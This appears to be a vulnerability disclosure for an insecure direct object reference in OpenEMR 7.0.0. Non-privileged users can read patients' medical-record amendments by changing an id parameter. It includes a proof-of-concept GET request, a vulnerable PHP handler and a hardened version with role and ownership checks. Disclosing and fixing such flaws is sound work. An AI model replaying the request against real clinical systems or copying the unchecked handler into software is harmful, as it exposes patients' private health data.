Non-privileged user can view Patient's Amendments in openemr/openemr
Jul 21st 2022
We would like to report a vulnerability we found during software testing. OpenEMR 7.0.0 (latest version), the open-source electronic health records and medical practice management application, has an Insecure Direct Object Reference (IDOR) in the “Patient’s Amendments” function, and it has never been reported before (we checked the official CVE website).
Insecure Direct Object Reference
Vulnerable Source Code
/var/www/localhost/htdocs/interface/patient_file/summary/add_edit_amendments.php (Please see more details in the occurrences section)
Applications don’t always verify that the user is authorized for the target object; the result is an insecure direct object reference flaw. A perpetrator who is an authorized system user (here a non-privileged user such as accounting or front office) simply changes a parameter value that directly refers to a system object so that it points at another object the user isn’t authorized for. As a result, an Insecure Direct Object Reference (IDOR) vulnerability allows remote attackers to view data (here, patient amendments) they should not have access to.
It is recommended to implement an access control check on the GET method to ensure the user is authorized for the requested object.
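The following is an added example, not code from OpenEMR or from the reporters, showing the two checks the recommendation above calls for on a GET handler that loads an amendment by ?id=: a role-based check (in OpenEMR itself this would go through its ACL helper, AclMain::aclCheckCore in 7.x, which is an assumption here) and an object-level check that the requested row belongs to the patient the session is working on. The role table, the amendments rows and the session arrays are constructed stand-ins so the script runs on its own with the php CLI.

```php
<?php
// Added example (not OpenEMR's code): object-level authorization for a
// GET handler that loads a patient amendment by ?id=. The role table, the
// amendments rows and the sessions below are constructed stand-ins; in
// OpenEMR the role check would be AclMain::aclCheckCore (assumed) and the
// row lookup would go through its SQL layer.
declare(strict_types=1);

// Constructed ACL: which roles may read clinical ("med") patient data.
const ROLE_CAN_READ_MED = [
    'administrator' => true,
    'physician'     => true,
    'clinician'     => true,
    'accounting'    => false,   // non-privileged, as in the report
    'front office'  => false,
];

// Constructed amendments table: id => [patient id, description].
const AMENDMENTS = [
    1 => ['pid' => 42, 'desc' => 'Patient requested allergy list correction'],
    2 => ['pid' => 77, 'desc' => 'Medication history amendment'],
];

/** Vulnerable pattern: any logged-in user can load any amendment by id. */
function amendmentVulnerable(array $session, int $id): ?array
{
    if (empty($session['authUser'])) {
        return null; // only authentication is checked, never authorization
    }
    return AMENDMENTS[$id] ?? null;
}

/** Hardened pattern: role check plus object-ownership check on the GET. */
function amendmentHardened(array $session, int $id): ?array
{
    if (empty($session['authUser'])) {
        return null;
    }
    // 1. Role-based check: does this role carry the clinical-read privilege?
    if (empty(ROLE_CAN_READ_MED[$session['role']])) {
        return null;
    }
    // 2. Object-level check: the amendment must belong to the patient the
    //    session currently has open, so ids cannot simply be walked.
    $row = AMENDMENTS[$id] ?? null;
    if ($row === null || $row['pid'] !== (int)$session['pid']) {
        return null;
    }
    return $row;
}

// Demo: an accounting user and a physician, both with patient 42 open.
$accounting = ['authUser' => 'acct1', 'role' => 'accounting', 'pid' => 42];
$physician  = ['authUser' => 'doc1',  'role' => 'physician',  'pid' => 42];

printf("vulnerable, accounting, id=1: %s\n", json_encode(amendmentVulnerable($accounting, 1)));
printf("hardened,   accounting, id=1: %s\n", json_encode(amendmentHardened($accounting, 1)));
printf("hardened,   physician,  id=1: %s\n", json_encode(amendmentHardened($physician, 1)));
printf("hardened,   physician,  id=2: %s\n", json_encode(amendmentHardened($physician, 2)));
```

The first line of the demo shows the reported behaviour: the accounting user gets the amendment back because only the login state is checked. The hardened version denies that user on the role check, allows the physician for the amendment of the open patient (id 1), and still denies the physician for id 2 because that row belongs to a different patient; both checks are needed, since a role check alone does not stop a privileged user from walking ids across patients.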
- Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team
Example PoC Screenshots
OpenEMR Version 7.0.0
Log in with Administrator privilege and add Amendments
Amendments successfully added via the normal steps
Log in as a non-privileged user
Direct access to the URL succeeds and the “Amendments Page” is displayed
Insecure direct object reference (IDOR)
GET /interface/patient_file/summary/add_edit_amendments.php?id=1 HTTP/1.1
Host: localhost
Cookie: OpenEMR=Xojlqu%2CirL3ibLmkKZOwVyA8rILh1jmpvFR7XDVAPti0jEHh
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
OpenEMR version 7.0.0 is therefore affected by an Insecure Direct Object Reference (IDOR) vulnerability allowing remote attackers to view Patient's Medical Record Amendments they should not have access to.